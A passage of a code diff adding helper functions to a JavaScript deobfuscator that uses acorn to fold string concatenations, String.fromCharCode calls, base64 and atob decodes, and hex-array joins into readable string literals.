+function foldConcatsOnly(sourceCode) {
+  const transforms = [];
+  let ast;
+  try {
+    ast = acorn.parse(sourceCode, {
+      ecmaVersion: 2024,
+      sourceType: 'module',
+      allowHashBang: true,
+      ranges: true
+    });
+  } catch {
+    return { code: sourceCode, transforms };
+  }
+  const replacements = [];
+  walk.simple(ast, {
+    BinaryExpression(node) {
+      if (node.operator !== '+') return;
+      const folded = tryFoldConcat(node);
+      if (folded === null) return;
+      const before = sourceCode.slice(node.start, node.end);
+      const after = quoteString(folded);
+      replacements.push({ start: node.start, end: node.end, value: after, type: 'string_concat', before });
+    }
+  });
+  // De-duplicate overlapping
+  replacements.sort((a, b) => a.start - b.start || b.end - a.end);
+  const filtered = [];
+  let lastEnd = -1;
+  for (const r of replacements) {
+    if (r.start < lastEnd) continue;
+    filtered.push(r);
+    lastEnd = r.end;
+  }
+  filtered.sort((a, b) => b.start - a.start);
+  let code = sourceCode;
+  for (const r of filtered) {
+    code = code.slice(0, r.start) + r.value + code.slice(r.end);
+    transforms.push({ type: r.type, start: r.start, end: r.end, before: r.before, after: r.value });
+  }
+  return { code, transforms };
+}
+// ============================================================
+// HELPERS
+// ============================================================
+/**
+ * Recursively fold string concat BinaryExpression.
+ * Returns the concatenated string, or null if any part is not a string literal.
+ */
+function tryFoldConcat(node) {
+  if (node.type === 'Literal' && typeof node.value === 'string') {
+    return node.value;
+  }
+  if (node.type === 'BinaryExpression' && node.operator === '+') {
+    const left = tryFoldConcat(node.left);
+    if (left === null) return null;
+    const right = tryFoldConcat(node.right);
+    if (right === null) return null;
+    return left + right;
+  }
+  return null;
+}
+/**
+ * Check if node is String.fromCharCode(...)
+ */
+function isStringFromCharCode(node) {
+  if (node.type !== 'CallExpression') return false;
+  const c = node.callee;
+  if (c.type !== 'MemberExpression') return false;
+  // String.fromCharCode
+  if (c.object?.type === 'Identifier' && c.object.name === 'String' &&
+      c.property?.type === 'Identifier' && c.property.name === 'fromCharCode') {
+    return true;
+  }
+  return false;
+}
+/**
+ * Extract numeric arguments from a call (handles direct numbers and spread of array).
+ * Returns array of numbers, or null if any argument is non-numeric.
+ */
+function extractNumericArgs(node) {
+  const nums = [];
+  for (const arg of node.arguments) {
+    if (arg.type === 'SpreadElement' && arg.argument?.type === 'ArrayExpression') {
+      for (const el of arg.argument.elements) {
+        if (el?.type === 'Literal' && typeof el.value === 'number') {
+          nums.push(el.value);
+        } else {
+          return null; // non-numeric — abort
+        }
+      }
+    } else if (arg.type === 'Literal' && typeof arg.value === 'number') {
+      nums.push(arg.value);
+    } else {
+      return null; // non-numeric argument (variable, expression) — abort
+    }
+  }
+  return nums.length > 0 ? nums : null;
+}
+/**
+ * Check if node is Buffer.from('...', 'base64').toString()
+ */
+function isBufferBase64ToString(node) {
+  if (node.type !== 'CallExpression') return false;
+  const callee = node.callee;
+  // .toString() call
+  if (callee.type !== 'MemberExpression') return false;
+  if (callee.property?.type !== 'Identifier' || callee.property.name !== 'toString') return false;
+  // The object is Buffer.from(str, 'base64')
+  const inner = callee.object;
+  if (inner?.type !== 'CallExpression') return false;
+  const innerCallee = inner.callee;
+  if (innerCallee?.type !== 'MemberExpression') return false;
+  if (innerCallee.object?.type !== 'Identifier' || innerCallee.object.name !== 'Buffer') return false;
+  if (innerCallee.property?.type !== 'Identifier' || innerCallee.property.name !== 'from') return false;
+  // Args: (string, 'base64')
+  if (inner.arguments.length < 2) return false;
+  if (inner.arguments[1]?.type !== 'Literal' || inner.arguments[1].value !== 'base64') return false;
+  if (inner.arguments[0]?.type !== 'Literal' || typeof inner.arguments[0].value !== 'string') return false;
+  return true;
+}
+/**
+ * Extract the base64 string argument from Buffer.from(str, 'base64').toString()
+ */
+function extractBufferBase64Arg(node) {
+  const inner = node.callee.object;
+  return inner.arguments[0].value;
+}
+/**
+ * Check if node is atob('...')
+ */
+function isAtobCall(node) {
+  if (node.type !== 'CallExpression') return false;
+  if (node.callee?.type !== 'Identifier' || node.callee.name !== 'atob') return false;
+  if (node.arguments.length !== 1) return false;
+  if (node.arguments[0]?.type !== 'Literal' || typeof node.arguments[0].value !== 'string') return false;
+  return true;
+}
+/**
+ * Try to resolve [0x63, ...].map(c => String.fromCharCode(c)).join('')
+ * Returns a replacement object or null.
+ */
+function tryResolveHexArrayMap(node, source) {
+  // Pattern: <expr>.join('') where <expr> is <array>.map(<fn>)
+  // node is the .join('') call
+  if (node.type !== 'CallExpression') return null;
+  const callee = node.callee;
+  if (callee?.type !== 'MemberExpression') return null;
+  if (callee.property?.type !== 'Identifier' || callee.property.name !== 'join') return null;
+  // Verify .join('') or .join("")
+  if (node.arguments.length !== 1) return null;
+  if (node.arguments[0]?.type !== 'Literal' || node.arguments[0].value !== '') return null;
+  // The object of .join should be a .map(...) call
+  const mapCall = callee.object;
+  if (mapCall?.type !== 'CallExpression') return null;
+  if (mapCall.callee?.type !== 'MemberExpression') return null;
+  if (mapCall.callee.property?.type !== 'Identifier' || mapCall.callee.property.name !== 'map') return null;
+  // The map callback should reference String.fromCharCode
+  if (mapCall.arguments.length < 1) return null;
+  const mapFn = mapCall.arguments[0];
+  if (!containsFromCharCode(mapFn)) return null;
+  // The object of .map should be an ArrayExpression of numbers
+  const arr = mapCall.callee.object;
+  if (arr?.type !== 'ArrayExpression') return null;
+  const nums = [];
+  for (const el of arr.elements) {
+    if (el?.type === 'Literal' && typeof el.value === 'number') {
+      nums.push(el.value);
+    } else {
+      return null; // non-numeric element — abort
+    }
+  }
+  if (nums.length === 0) return null;
+  try {
+    const decoded = String.fromCharCode(...nums);
+    const before = source.slice(node.start, node.end);
+    return {
+      start: node.start,
+      end: node.end,
+      value: quoteString(decoded),
+      type: 'hex_array',
+      before
+    };
+  } catch {
+    return null;
+  }
+}
+/**
+ * Check if an AST node (a function/arrow function) contains a reference to String.fromCharCode.
+ */
+function containsFromCharCode(node) {
+  if (!node || typeof node !== 'object') return false;
+  // Direct check on this node
+  if (node.type === 'MemberExpression' &&
+      node.object?.type === 'Identifier' && node.object.name === 'String' &&
+      node.property?.type === 'Identifier' && node.property.name === 'fromCharCode') {
+    return true;
+  }
+  // Recurse into child nodes
+  for (const key of Object.keys(node)) {
+    if (key === 'type' || key === 'start' || key === 'end' || key === 'range') continue;
+    const child = node[key];
+    if (Array.isArray(child)) {
+      for (const c of child) {
+        if (c && typeof c === 'object' && containsFromCharCode(c)) return true;
+      }
+    } else if (child && typeof child === 'object' && child.type) {
+      if (containsFromCharCode(child)) return true;
+    }
+  }
+  return false;
+}
+/**
+ * Quote a string value as a JS single-quoted string literal.
+ */
+function quoteString(str) {
+  const escaped = str
+    .replace(/\\/g, '\\\\')
+    .replace(/'/g, "\\'")
+    .replace(/\n/g, '\\n')
+    .replace(/\r/g, '\\r')
+    .replace(/\t/g, '\\t');
+  return `'${escaped}'`;
+}
+/**
+ * Check if a decoded string is "printable" (no control chars except whitespace).
+ * Prevents replacing base64 that decodes to binary garbage.
+ */
+function isPrintable(str) {
+  // Allow printable ASCII + common unicode + whitespace
+  // Reject if more than 20% of chars are control characters
+  let controlCount = 0;
+  for (let i = 0; i < str.length; i++) {
+    const code = str.charCodeAt(i);
+    if (code < 32 && code !== 9 && code !== 10 && code !== 13) {
+      controlCount++;
+    }
+  }
+  if (str.length === 0) return false;
+  return (controlCount / str.length) < 0.2;
+}
+module.exports = { deobfuscate };